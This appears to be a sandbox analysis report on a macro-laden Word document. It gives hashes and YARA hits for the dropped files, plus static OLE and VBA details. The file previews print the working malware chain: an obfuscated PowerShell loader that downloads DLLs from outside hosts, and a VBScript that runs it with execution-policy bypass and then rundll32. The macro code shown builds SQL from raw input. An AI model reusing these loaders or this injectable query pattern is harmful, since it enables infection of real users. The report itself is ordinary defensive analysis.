                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):133120
                                                                                              Entropy (8bit):6.80295704690346
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:Jbd2Mz2LOfkmkL5WQQ17fkmkL5WQQ1jRh9nQfkmkL5WQQ1:JbdH2Ukmkt9Qpkmkt9Q9Rh9nakmkt9Q
                                                                                              MD5:7702C90FF5098D859FE4837B13137777
                                                                                              SHA1:A02C1E38674E1D263EE1B696F94632950F8FF8EF
                                                                                              SHA-256:EC8650D2C13AC25176D9B119BEBF5CB2CCA3B861FDF3BA495D1FD385BF1AB928
                                                                                              SHA-512:FA0C9FC9D91174A89F02DEAFC043C9CFE2CEDC02E6699C6808BE63F6A88EC9F17AD47B80BD41E65373E157C364DFD56E9A1A67481829264BACEF0102053AD563
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp, Author: Joe Security
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CEA04FE6-8D47-46DE-880E-C9FDF00950BC}.tmp
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):1024
                                                                                              Entropy (8bit):0.05390218305374581
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                              Malicious:false
                                                                                              C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):147284
                                                                                              Entropy (8bit):4.421573738772708
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:C8JL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcmB:CWJNSc83tKBAvQVCgOtmXmLpLmB
                                                                                              MD5:8BCBE128B5CFEDC8168306182B5B3502
                                                                                              SHA1:39AF9B55FF487DDFF2349879D0D343E38C84A0D8
                                                                                              SHA-256:FA8CE7BAB40FA8F89B697A3C594FB1E72E38B02222F27870F15805ED715808DA
                                                                                              SHA-512:0893A055C42D46FB627D50EFEF8197DB1BD94DA71ADAB9329FC0E0B86EA05E037BEFC067FEA864D0F75558DF339BBF072EBC6CB5A29859B9D1A07040154258D9
                                                                                              Malicious:false
                                                                                              C:\Users\user\AppData\Local\Temp\~DF17CD00BA0C1E5190.TMP
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):512
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                              Malicious:false
                                                                                              C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):59392
                                                                                              Entropy (8bit):7.254851437421879
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:4fkmkGng5kPBevBX3v410SfkmkGng5kPBevBX3v41fRh96:4fkmkL5WQQ17fkmkL5WQQ1fRh9
                                                                                              MD5:FADEECDED6606EF2CE4624D10A841716
                                                                                              SHA1:AE9C759BB2F2A266C4DBFC165665BF06DE276800
                                                                                              SHA-256:B287A49EA96FBD5D2018F1AB8C4DD9F320DF49B0E553C71D36CB305A308C8DA5
                                                                                              SHA-512:0B3A17E4412300B98CD8A99960316D2B3FB23080D451B9A09BD5C64880AA3EA599636B3E4F5C6E7EE3F71D99E3B1866A174C2A8A530CBB8B2BDEDA1E144A72F1
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP, Author: Joe Security
                                                                                              C:\Users\user\AppData\Local\Temp\~DF591C17C8C82AFF5A.TMP
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):512
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                              Malicious:false
                                                                                              C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):194560
                                                                                              Entropy (8bit):6.094790590693576
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:PyOacwQn17zBqY2aIFUaSKQYxJckmkt9Qokmkt9QvRhOtgkmkVQG:bacp1McyRhO9j
                                                                                              MD5:151411F0596334D8B52C591FC2B37F5F
                                                                                              SHA1:985C893366FEBC507C4CD4A56B3F8E91572E53E0
                                                                                              SHA-256:CA6A8AAD87E472007800AE97C6A32491B6D3C657931BEA7381DFB083B94DF40E
                                                                                              SHA-512:8629729426CB74F0F01E5A5F3668CBE569C59E216152AFE6524317DDF54EB2A4FB74DFC7F2587654E911D3D5F042D5306DDA8915AEAF82920ECF3DDFDEF1F3E1
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP, Author: Joe Security
                                                                                              C:\Users\user\AppData\Local\Temp\~DFE56B344EF3200177.TMP
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):77312
                                                                                              Entropy (8bit):7.460245093829445
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:ifkmkL5WQQ1EfkmkL5WQQ1EfkmkL5WQQ1:Ukmkt9Qokmkt9Qokmkt9Q
                                                                                              MD5:0EE6ED61BF1B98BEC33CB471FFC90224
                                                                                              SHA1:9BC4A8290C1ACB0568E93D6B11ED64A6B94B33CB
                                                                                              SHA-256:EEF36474CA9F2D98514E630E2691FA340D5F02012337D51E96881BC917A4C320
                                                                                              SHA-512:C372D50C2886A8151DF0E55E999840A90DA63214F5C57BCC98C07DE129D900F68A80527A9FC5A5DDA0D59EE53CCC89A726B9F8C5FB9526E4F7041A176AE3B374
                                                                                              Malicious:false
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):71
                                                                                              Entropy (8bit):4.385908395318507
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:bDuMJlOhVIzCmX1DLzCv:bClIzlzs
                                                                                              MD5:C77D8A0B970AA8CD5E9C8A2A633D2017
                                                                                              SHA1:2D08EBEA4F4B15E71BAB05A2AD2B3F5C58554277
                                                                                              SHA-256:8BF29712207B789BA72E60B7DBEC5A07AE731C254B696D763A6776BF7FCC88B1
                                                                                              SHA-512:F05B3B4E1C5924B2E77E9768381873E3002ACD19F21C6B280B3E7F221FE70D50174C8D10BB4AF0620939BA6607E1BA25AE4FDDCEAECB6F98E1300D07847C9834
                                                                                              Malicious:false
                                                                                              Preview: [folders]..Templates.LNK=0..sample.doc.LNK=0..[doc]..sample.doc.LNK=0..
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sample.doc.LNK
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 26 01:39:16 2021, mtime=Fri Nov 26 01:39:16 2021, atime=Fri Nov 26 01:39:20 2021, length=229888, window=hide
                                                                                              Category:dropped
                                                                                              Size (bytes):1014
                                                                                              Entropy (8bit):4.51966511344641
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:8K/XTkZvQhG1lRzecNlRsDv3qKl4Qd7Qy:8K/XTUIIlRzTNlRDKl4Uj
                                                                                              MD5:24990F42BF960D1887DAD884A503A870
                                                                                              SHA1:DBB358E40600F9D5548C8A12C27B55F1F665906E
                                                                                              SHA-256:289E7A949FF16F4EFDA52D5D849A02006DB6EE79000DBEFAAFC0A48C40749DAB
                                                                                              SHA-512:437980B54D95F615A816AFF53D9136E8F15D17DCC9A36CCCDE4D6712C7B6BE2F9EC96933C30B20216046C67687D579298541AA6B34F2352CAFA1167A8C858CCC
                                                                                              Malicious:false
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):162
                                                                                              Entropy (8bit):2.5038355507075254
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                              Malicious:false
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):8016
                                                                                              Entropy (8bit):3.576574774824662
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:chQCsMqLqvsqvJCwoo4z8hQCsMqLqvsEHyqvJCwore4zj9Y0H74F2+nlUVq4A2:c6+obz86WHnortzjAF2+mA2
                                                                                              MD5:5E14B167E03C155C1114041459FB27ED
                                                                                              SHA1:011646BD83E9DC58E812E4BF20405944F1647979
                                                                                              SHA-256:4FDF16FA08416536D6B952F47B8AB04BAFED7000C25EB064BD44305026E21140
                                                                                              SHA-512:318540E69F07FE40C45AFE63542008966E90D419751B51AB736C7C86164B21E8051C4BB6202C2D4524857FDB1150244E857EC2BC007BE96DA194061628C8C912
                                                                                              Malicious:false
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CDOKOHSTDD9BH9UY8W35.temp
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):8016
                                                                                              Entropy (8bit):3.576574774824662
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:chQCsMqLqvsqvJCwoo4z8hQCsMqLqvsEHyqvJCwore4zj9Y0H74F2+nlUVq4A2:c6+obz86WHnortzjAF2+mA2
                                                                                              MD5:5E14B167E03C155C1114041459FB27ED
                                                                                              SHA1:011646BD83E9DC58E812E4BF20405944F1647979
                                                                                              SHA-256:4FDF16FA08416536D6B952F47B8AB04BAFED7000C25EB064BD44305026E21140
                                                                                              SHA-512:318540E69F07FE40C45AFE63542008966E90D419751B51AB736C7C86164B21E8051C4BB6202C2D4524857FDB1150244E857EC2BC007BE96DA194061628C8C912
                                                                                              Malicious:false
                                                                                              C:\Users\user\AppData\Roaming\www.ps1
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1455
                                                                                              Entropy (8bit):5.3208532483583255
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:N6TdXzdU4odZVG6TdCTe4NodZVG6TdNgGodZVG6TdHICmodZVG6TdY8odv:CzuVbVYHCbVLgHbVhICnbVyR1
                                                                                              MD5:2311EE4F9DE83188EF324AB2ACF84CB4
                                                                                              SHA1:0A38AF25D5319830C05A862FEEAA1E75F52D2969
                                                                                              SHA-256:6221BB6E0CBB8160161DE0B384FAA6124BD43FA985C16597BDEE6DEB4FDAC3C7
                                                                                              SHA-512:89871487A1677BCFD10E3EE487AB781A72EFDCBEB3EEF1C9540B212775EF774729A7A933BBF620B42B1834B19E30EAE7B7D48410977C54966CA8B8996E3FA81F
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Roaming\www.ps1, Author: Joe Security
                                                                                              Preview: start-sleep -s 1..$Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://ghapan.com/Kdg73onC3oQ/090921.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;..start-sleep -s 1..$Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gruasingenieria.pe/LUS1NTVui6/090921.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;..start-sleep -s 1..$Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://yoowi.net/tDzEJ8uVGwdj/130921.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;..start-sleep -s 1..$Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr=
                                                                                              C:\Users\user\AppData\Roaming\www.txt
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):655
                                                                                              Entropy (8bit):5.463013231984915
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:leka9OeYUTXvWdrs6po8hMknZSfargLrZSfaQgq+rZSfapgXZSfaRggIfNUZSfac:3GAdKCBgVqxajgTg9No1da
                                                                                              MD5:9C47EAA0A6D17B58D4BB72912DDD12EB
                                                                                              SHA1:86A198833BA77CABEA2923D6F6DF3499109C4524
                                                                                              SHA-256:29757901313239CEFC88C9075793064D0CDC956B373792949582C97E5115D508
                                                                                              SHA-512:A9BE6921D20868D7FF2F4429C586897D68FBF3D891E5429E718176AE224311995E921021439319C2D5A48A81A94D51519D39125A90964FBE84DCB07F904E0974
                                                                                              Malicious:true
                                                                                              Preview: Dim WAITPLZ, WS..WAITPLZ = DateAdd(Chr(115), 2, Now())..Do Until (Now() > WAITPLZ)..Loop..On Error Resume Next..BB="Powershell"..CC=" -ExecutionPolicy Bypass"..SS=" & "..FF="%AppData%\www.ps1"..OK = BB+CC+QQ+SS+FF..Set Ran = CreateObject("WScript.Shell")..Ran.Run OK,0..WScript.Sleep(11000)..OK1 = "cmd /c rundll32.exe C:\ProgramData\www1.dll,ldr"..Ran.Run OK1,0..OK2 = "cmd /c rundll32.exe C:\ProgramData\www2.dll,ldr"..Ran.Run OK2,0..OK3 = "cmd /c rundll32.exe C:\ProgramData\www3.dll,ldr"..Ran.Run OK3,0..OK4 = "cmd /c rundll32.exe C:\ProgramData\www4.dll,ldr"..Ran.Run OK4,0..OK5 = "cmd /c rundll32.exe C:\ProgramData\www5.dll,ldr"..Ran.Run OK5,0....
                                                                                              C:\Users\user\Desktop\~$mple.doc.doc
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):162
                                                                                              Entropy (8bit):2.5038355507075254
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                              Malicious:false

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: x, Template: Normal, Last Saved By: Windows User, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Tue Sep 14 08:05:00 2021, Last Saved Time/Date: Mon Nov 22 08:31:00 2021, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0
                                                                                              Entropy (8bit):6.880276075478732
                                                                                              TrID:
                                                                                              • Microsoft Word document (32009/1) 35.95%
                                                                                              • Microsoft Excel sheet (30009/1) 33.71%
                                                                                              • Microsoft Word document (old ver.) (19008/1) 21.35%
                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 8.99%
                                                                                              File name:sample.doc.doc
                                                                                              File size:216577
                                                                                              MD5:6be56f977b6692fb6ce5f94e110664e3
                                                                                              SHA1:f4d5ce35c656e0f156a2ced453a964faabef09fb
                                                                                              SHA256:ae94cd20505f914bba5e612acb80c429c5606a739c0838e3a5f87bfcc7cc8519
                                                                                              SHA512:15252a12c860af4afbf300a33d4e2c984535f9837b0b41f0a7fde378a13c8560fd38813d8e3e0a02bb5d11bab3ae1a1490fc44b3b4eacbff5d1cd89cbb60a001
                                                                                              SSDEEP:3072:i1Ew9u9qLF0EYouFCoOVayLUqjk5efg/kmkt9Qpkmkt9QaRhQnfkmkt9Q:i1EJoEouaLI5efnLbRhQnc

                                                                                              File Icon

                                                                                              Icon Hash:e4eea2aaa4b4b4a4

                                                                                              Static OLE Info

                                                                                              General

                                                                                              Document Type:OLE
                                                                                              Number of OLE Files:1

                                                                                              OLE File "sample.doc.doc"

                                                                                              Indicators

                                                                                              Has Summary Info:True
                                                                                              Application Name:Microsoft Office Word
                                                                                              Encrypted Document:False
                                                                                              Contains Word Document Stream:True
                                                                                              Contains Workbook/Book Stream:False
                                                                                              Contains PowerPoint Document Stream:False
                                                                                              Contains Visio Document Stream:False
                                                                                              Contains ObjectPool Stream:
                                                                                              Flash Objects Count:
                                                                                              Contains VBA Macros:True

                                                                                              Summary

                                                                                              Code Page:1252
                                                                                              Title:
                                                                                              Subject:
                                                                                              Author:x
                                                                                              Keywords:
                                                                                              Comments:
                                                                                              Template:Normal
                                                                                              Last Saved By:Windows User
                                                                                              Revision Number:3
                                                                                              Total Edit Time:180
                                                                                              Create Time:2021-09-14 07:05:00
                                                                                              Last Saved Time:2021-11-22 08:31:00
                                                                                              Number of Pages:1
                                                                                              Number of Words:0
                                                                                              Number of Characters:2
                                                                                              Creating Application:Microsoft Office Word
                                                                                              Security:0

                                                                                              Document Summary

                                                                                              Document Code Page:-535
                                                                                              Number of Lines:1
                                                                                              Number of Paragraphs:1
                                                                                              Thumbnail Scaling Desired:False
                                                                                              Company:SPecialiST RePack
                                                                                              Contains Dirty Links:False
                                                                                              Shared Document:False
                                                                                              Changed Hyperlinks:False
                                                                                              Application Version:1048576

                                                                                              Streams with VBA

                                                                                              VBA File Name: Module1.vba, Stream Size: 9376
                                                                                              General
                                                                                              Stream Path:Macros/VBA/Module1
                                                                                              VBA File Name:Module1.vba
                                                                                              Stream Size:9376
                                                                                              VBA Code
                                                                                              Attribute VB_Name = "Module1"
                                                                                              Option Explicit
                                                                                                  Global con As ADODB.Connection
                                                                                                  Global rs As ADODB.Recordset
                                                                                              
                                                                                              Public Sub Connect_Student_Trans1()
                                                                                                  On Error Resume Next
                                                                                                  Set con = New ADODB.Connection
                                                                                                  con.Open "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"
                                                                                                  'Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLEXPRESS"
                                                                                                  End Sub
                                                                                              
                                                                                              'Public Sub View_Student_Trans1()
                                                                                              'Set rs = New ADODB.Recordset
                                                                                              'rs.Open "select *  from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic
                                                                                              'Set frmTrans1.DataGrid2.DataSource = rs
                                                                                              'End Sub
                                                                                              
                                                                                              Public Sub Edit_Book_Tran()
                                                                                              Set rs = New ADODB.Recordset
                                                                                                  rs.Open "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= " &     "'" & frmTrans1.DataGrid4.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                                  frmTrans1.txtCall_no.Text = rs!Call_no
                                                                                                  frmTrans1.txtTitle.Text = rs!Title
                                                                                                  frmTrans1.txtAuthor.Text = rs!Author
                                                                                                  frmTrans1.txtACC.Text = rs!Acc_no
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub View_StudentS_Trans1()
                                                                                              Set rs = New ADODB.Recordset
                                                                                              rs.Open "select *  from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic
                                                                                              Set frmTrans1.DataGrid1.DataSource = rs
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub Search_Trans1()
                                                                                              Set rs = New ADODB.Recordset
                                                                                              If frmTrans1.cboSea.Text = "ID" Then
                                                                                              rs.Open "Select * from Tbl_STUDENTS " & "where ID = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              ElseIf frmTrans1.cboSea.Text = "Lastname" Then
                                                                                              rs.Open "Select * from dbo.Tbl_STUDENTS " & "where Lastname = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              ElseIf frmTrans1.cboSea.Text = "Course" Then
                                                                                              rs.Open "Select * from dbo.Tbl_STUDENTS " & "where Course = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              End If
                                                                                              Set frmTrans1.DataGrid1.DataSource = rs
                                                                                              End Sub
                                                                                              
                                                                                              Public Sub Search_Book1()
                                                                                              Set rs = New ADODB.Recordset
                                                                                              If frmTrans1.cboSBook.Text = "Call no" Then
                                                                                              rs.Open "Select * from Tbl_BOOK " & "where Call_no = '" & frmTrans1.txtSBook & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              ElseIf frmTrans1.cboSBook.Text = "Book Name" Then
                                                                                              rs.Open "Select * from dbo.Tbl_BOOK " & "where Title = '" & frmTrans1.txtSBook.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              
                                                                                              End If
                                                                                              Set frmTrans1.DataGrid4.DataSource = rs
                                                                                              End Sub
                                                                                              
                                                                                              
                                                                                              Public Sub Datagrid_Trans1()
                                                                                              Set rs = New ADODB.Recordset
                                                                                                  rs.Open "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= " &     "'" & frmTrans1.DataGrid1.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                                  frmTrans1.txtID.Text = rs!ID
                                                                                                  frmTrans1.lblname.Caption = rs!Firstname
                                                                                                  frmTrans1.lblmi.Caption = rs!MI
                                                                                                  frmTrans1.lbllast.Caption = rs!Lastname
                                                                                              End Sub
                                                                                              
                                                                                               Public Sub Display_borrower()
                                                                                                 Set rs = New ADODB.Recordset
                                                                                              rs.Open "select *from Tbl_Transaction where ID ='" & frmTrans1.txtID.Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                              Set frmTrans1.Datagrid3.DataSource = rs
                                                                                              
                                                                                               End Sub
                                                                                              
                                                                                              'Public Sub View_Trans3()
                                                                                              'Set rs = New ADODB.Recordset
                                                                                              'rs.Open "select *  from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic
                                                                                              'Set frmTrans1.DataGrid5.DataSource = rs
                                                                                              'End Sub
                                                                                              
                                                                                              Public Sub View_Trans3result()
                                                                                              Set rs = New ADODB.Recordset
                                                                                              rs.Open "select *  from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic
                                                                                              Set frmTrans1.DataGrid4.DataSource = rs
                                                                                              End Sub
                                                                                              
                                                                                              
                                                                                              Public Sub OkBorrowed()
                                                                                              con.Execute "insert into dbo.Tbl_TRANSACTION values(" &                 "'" & frmTrans1.txtID.Text & "'," &                 "'" & frmTrans1.txtCall_no.Text & "'," &                 "'" & frmTrans1.txtTitle.Text & "'," &                 "'" & frmTrans1.txtAuthor.Text & "'," &                 "'" & frmTrans1.txtACC.Text & "'," &                 "'" & frmTrans1.txtBorrow.Text & "'," &                 "'" & frmTrans1.txtDue.Text & "'," &                 "'" & frmTrans1.txtReturned.Text & "'," &                 "'" & frmTrans1.txtRemarks.Text & "')"
                                                                                                  frmTrans1.palen.Caption = 1
                                                                                              End Sub
                                                                                              
                                                                                              
                                                                                              Public Sub Display_list()
                                                                                                Set rs = New ADODB.Recordset
                                                                                                  rs.Open "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= " &     "'" & frmTrans1.Datagrid3.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                               frmTrans1.txtCall_no.Text = rs!Call_no
                                                                                               frmTrans1.txtTitle.Text = rs!Title
                                                                                               frmTrans1.txtAuthor.Text = rs!Author
                                                                                               frmTrans1.txtACC.Text = rs!Acc_no
                                                                                              End Sub
                                                                                              
                                                                                               Public Sub Returned()
                                                                                               Set rs = New ADODB.Recordset
                                                                                                       rs.Open "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.Datagrid3.Columns.Item(3).Text & "'", con, adOpenStatic, adLockOptimistic
                                                                                                       frmTrans1.txtCall_no.Text = rs!Call_no
                                                                                                       frmTrans1.txtTitle.Text = rs!Title
                                                                                                       frmTrans1.txtAuthor.Text = rs!Author
                                                                                                       frmTrans1.txtACC.Text = rs!Acc_no
                                                                                                       frmTrans1.txtBorrow.Text = rs!Date_Borrowed
                                                                                                       frmTrans1.txtDue.Text = rs!Date_Due
                                                                                                       frmTrans1.txtReturned.Text = rs!Date_Returned
                                                                                                       frmTrans1.txtRemarks.Text = "Returned"
                                                                                               End Sub
                                                                                              
                                                                                              Public Sub Returned1()
